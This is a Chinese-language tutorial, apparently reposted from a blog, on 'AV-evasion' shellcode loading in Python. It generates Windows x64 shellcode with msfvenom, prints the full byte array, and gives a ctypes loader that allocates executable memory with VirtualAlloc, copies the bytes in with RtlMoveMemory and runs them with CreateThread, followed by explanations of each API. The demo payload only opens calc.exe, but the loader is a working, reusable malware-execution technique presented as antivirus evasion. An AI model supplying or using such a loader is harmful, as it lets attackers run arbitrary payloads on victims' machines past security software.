0x01 生成shellcode

首先通過下列命令生成一個shellcode，使用msfvenom -p選項來指定paylaod，這里選用windows/x64、exec模塊接收的參數。使用calc.exe執行彈出計算器的操作。-f選項用來執行生成的shellcdoe的編譯語言。

msfvenom -p windows/x64/exec CMD='calc.exe' -f py

0x02 加載與執行shellcode的程序

程序為：

# -*- coding:utf-8 -*-import ctypes from ctypes import * from ctypes.wintypes import * import sysPAGE_EXECUTE_READWRITE = 0x00000040 MEM_COMMIT = 0x3000 PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)VirtualAlloc = windll.kernel32.VirtualAlloc RtlMoveMemory = windll.kernel32.RtlMoveMemory CreateThread = windll.kernel32.CreateThread WaitForSingleObject = windll.kernel32.WaitForSingleObject OpenProcess = windll.kernel32.OpenProcess VirtualAllocEx = windll.kernel32.VirtualAllocEx WriteProcessMemory = windll.kernel32.WriteProcessMemory CreateRemoteThread = windll.kernel32.CreateRemoteThreadshellcode = bytearray(b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65"b"\x78\x65\x00" )def run1():VirtualAlloc.restype = ctypes.c_void_p #重載函數返回類型為voidp = VirtualAlloc(c_int(0),c_int(len(shellcode)),MEM_COMMIT,PAGE_EXECUTE_READWRITE)#申請內存buf = (c_char * len(shellcode)).from_buffer(shellcode)#將shellcdoe指向指針RtlMoveMemory(c_void_p(p),buf,c_int(len(shellcode)))#復制shellcdoe到申請的內存中h = CreateThread(c_int(0),c_int(0),c_void_p(p),c_int(0),c_int(0),pointer(c_int(0))) #執行創建線程WaitForSingleObject(c_int(h),c_int(-1))#檢測線程創建事件if __name__ == "__main__":run1()

0x03 程序解釋

• 導入模塊，并且程序分配內存還有可進行讀寫操作。

import ctypes from ctypes import * from ctypes.wintypes import * import sysPAGE_EXECUTE_READWRITE = 0x00000040 MEM_COMMIT = 0x3000 PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)

區域可執行代碼，可讀可寫

PAGE_EXECUTE_READWRITE = 0x00000040

分配內存

MEM_COMMIT = 0x3000

給予進程所有權限

PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)

• 調用windows api

VirtualAlloc = windll.kernel32.VirtualAlloc RtlMoveMemory = windll.kernel32.RtlMoveMemory CreateThread = windll.kernel32.CreateThread WaitForSingleObject = windll.kernel32.WaitForSingleObject OpenProcess = windll.kernel32.OpenProcess VirtualAllocEx = windll.kernel32.VirtualAllocEx WriteProcessMemory = windll.kernel32.WriteProcessMemory CreateRemoteThread = windll.kernel32.CreateRemoteThread

• 將前面生成的shellcode賦值給shellcode參數，賦值前使用bytearray函數處理

shellcode = bytearray(b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65"b"\x78\x65\x00" )

• 創建一個方法并調用，申請內存，將shellcode指向分配的內存指針，再復制shellcode到內存中，創建線程事件并執行：

def run1():VirtualAlloc.restype = ctypes.c_void_p #重載函數返回類型為voidp = VirtualAlloc(c_int(0),c_int(len(shellcode)),MEM_COMMIT,PAGE_EXECUTE_READWRITE)#申請內存buf = (c_char * len(shellcode)).from_buffer(shellcode)#將shellcdoe指向指針RtlMoveMemory(c_void_p(p),buf,c_int(len(shellcode)))#復制shellcdoe到申請的內存中h = CreateThread(c_int(0),c_int(0),c_void_p(p),c_int(0),c_int(0),pointer(c_int(0))) #執行創建線程WaitForSingleObject(c_int(h),c_int(-1))#檢測線程創建事件

VirtualAlloc是用來申請內存空間，是一個Windows API函數，它的聲明為：

LPVOID VirtualAlloc{ LPVOID lpAddress, // 要分配的內存區域的地址 DWORD dwSize, // 分配的大小 DWORD flAllocationType, // 分配的類型 DWORD flProtect // 該內存的初始保護屬性 };

RtlMoveMemory從指定內存中復制內存至另一內存里.語法為：

VOID RtlMoveMemory( VOID UNALIGNED *Destination, const VOID UNALIGNED *Source, SIZE_T Length );

參數：

Destination ：指向移動目的地址的指針。 Source ：指向要復制的內存地址的指針。 Length ：指定要復制的字節數。

CreateThread是一種微軟在Windows API中提供了建立新的線程的函數，該函數在主線程的基礎上創建一個新線程。
函數原型：

HANDLE CreateThread( LPSECURITY_ATTRIBUTES lpThreadAttributes,//SD SIZE_T dwStackSize,//initialstacksize LPTHREAD_START_ROUTINE lpStartAddress,//threadfunction LPVOID lpParameter,//threadargument DWORD dwCreationFlags,//creationoption LPDWORD lpThreadId//threadidentifier )

參數意義

lpThreadAttributes：指向SECURITY_ATTRIBUTES型態的結構的指針。在Windows 98中忽略該參數。在Windows NT中，NULL使用默認安全性，不可以被子線程繼承，否則需要定義一個結構體將它的bInheritHandle成員初始化為TRUE。

dwStackSize，設置初始棧的大小，以字節為單位，如果為0，那么默認將使用與調用該函數的線程相同的棧空間大小。任何情況下，Windows根據需要動態延長堆棧的大小。

lpStartAddress，指向線程函數的指針，形式：@函數名，函數名稱沒有限制

lpParameter：向線程函數傳遞的參數，是一個指向結構的指針，不需傳遞參數時，為NULL。

dwCreationFlags ：線程標志,可取值如下
（1）CREATE_SUSPENDED(0x00000004)：創建一個掛起的線程，
（2）0：表示創建后立即激活。
（3）STACK_SIZE_PARAM_IS_A_RESERVATION(0x00010000)：dwStackSize參數指定初始的保留堆棧 的大小，否則,dwStackSize指定提交的大小。該標記值在Windows 2000/NT and Windows Me/98/95上不支持。

lpThreadId:保存新線程的id。
WaitForSingleObject是一種Windows API函數。當等待仍在掛起狀態時，句柄被關閉，那么函數行為是未定義的。該句柄必須具有 SYNCHRONIZE 訪問權限。
聲明：

DWORD WINAPI WaitForSingleObject( __in HANDLE hHandle, __in DWORD dwMilliseconds );

hHandle[in]對象句柄。可以指定一系列的對象，如Event、Job、Memory resource notification、Mutex、Process、Semaphore、Thread、Waitable timer等。
dwMilliseconds[in]定時時間間隔，單位為milliseconds（毫秒）.如果指定一個非零值，函數處于等待狀態直到hHandle標記的對象被觸發，或者時間到了。如果dwMilliseconds為0，對象沒有被觸發信號，函數不會進入一個等待狀態，它總是立即返回。如果dwMilliseconds為INFINITE，對象被觸發信號后，函數才會返回。

運行程序可以成功彈出計算器。

總結

以上是生活随笔為你收集整理的python免杀技术---shellcode的加载与执行的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。